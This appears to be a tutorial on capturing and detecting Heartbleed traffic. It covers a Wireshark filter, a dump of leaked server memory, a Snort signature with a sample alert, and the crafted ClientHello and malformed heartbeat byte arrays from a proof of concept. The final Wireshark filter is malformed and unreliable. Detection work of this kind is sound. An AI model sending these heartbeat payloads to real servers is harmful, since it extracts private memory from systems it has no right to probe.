Network Capture and Detection
The Heartbleed vulnerability uses a software flaw in openssl, which uses a Heartbeat Request within SSL/TLS to expose up to 64KB of data on a Web server. In this demo, we probe for the vulnerability, and then capture the network packets. These are at:
https://dl.dropboxusercontent.com/u/40355863/heartbleed.zip
You can search for Heartbeart Request with:
tcp matches "\x18\x03"
Figure 1: Heartbeat Request
If we follow the network trace, we see the memory capture coming back:
...........SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5...............
...
.........3.2.....E.D...../...A.................................I.........
.4.2...
...........
...................................#...........B...>..SM..Z..@..%.4..b.....G.L..Okd..m....................#......................0...0.............j..p].0
..*.H..
.....0.1.0
..U....ubuntu0..
140415192450Z.
240412192450Z0.1.0
..U....ubuntu0.."0
..*.H..
..........0..
......K...7.....Z....bQ.u(5..I'.QJ.......x.!7*H"+.EG..>b.gD.._.....{.R+/...q}.....g...yE.<=q..(.r........\.iI>.....v.yv.+..F#..U....L..#D[..6...L.F@h..0....j.U..\D.J.....{ke...
..s.N......^e...+.DV..?..O.~4.......
or.#...-....6....&..{..Y|R.f.
$>.k....S....0.........
0.0...U....0.0
..*.H..
..........R_...;...d...?Q.V.).YI.....vY...2a4.;.ubF..4.....H....&..w....u...y".=.2g..o7..}..]0......y5H.F..
k.T.v@B5..9".3..../Gb...u.7wm.[.....{.
9.......H...m..Z N.e....m.....E...g..y).q.5`...E(..U>".)......Hw.........:.E.p........s..C.).E/O.r...KNoW..^..l..........K...G...A.%.?y....x.7..H.......B...F.B.....&....4(.L..=.....]2....=.b.n.;..."\.k.J.....M..g9...y%.....~..JOL..=.A...J7O.Q...\)6.P.@...p.....[...{.........XS....o..b..v....e.. ...x..w.|..t..e..hM....^.u.>
..X|..c_...h...kl..A....j..3G....=.8........#pG..S.....L...}..j->=m..p.9....../k...$........:
t.S..........L.......t..E.8..F0h.................@....@..@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5...............
...
.........3.2.....E.D...../...A.................................I.........
.4.2...
...........
...................................#.......-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
If-Modified-Since: Tue, 15 Apr 2014 19:24:48 GMT
If-None-Match: "b1-4f719c0d83492-gzip"
.....U. .[D.)K.....................................................................
Snort detection
We can see that the TLS Heartbeat Request has a packet payload with a hexadecimal pattern of 0x18, 0x03, 0x02 and 0x00. With Snort, we can detect this pattern with a signature of:
alert tcp any any -> any 443 (msg:"Heartbeat request"; content:"|18 03 02 00|"; rawbytes;sid:100000)
Next running the vulnerabilty scan, we get an alert of:
[**] [1:100000:0] Heartbeat request [**] [Priority: 0] 04/16-13:03:11.524491 172.16.121.1:64670 -> 172.16.121.150:443 TCP TTL:64 TOS:0x0 ID:11426 IpLen:20 DgmLen:60 DF ***AP*** Seq: 0xFBF142E1 Ack: 0x61B93B9D Win: 0x2000 TcpLen: 32 TCP Options (3) => NOP NOP TS: 712292260 2460366
Detailed analysis
We can now perform a detailed analysis with:
The crafted packets sent are:
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hbv10 = h2bin('''
18 03 01 00 03
01 40 00
''')
hbv11 = h2bin('''
18 03 02 00 03
01 40 00
''')
Thus we can search for these packets using:
tcp matches "\x16\x03x02x00"
and then can view the result, which shows that the result is non-encrypted (as shown in Figure 3).
Figure 3: Non-encrypted response to Heartbeat Request
billatnapier 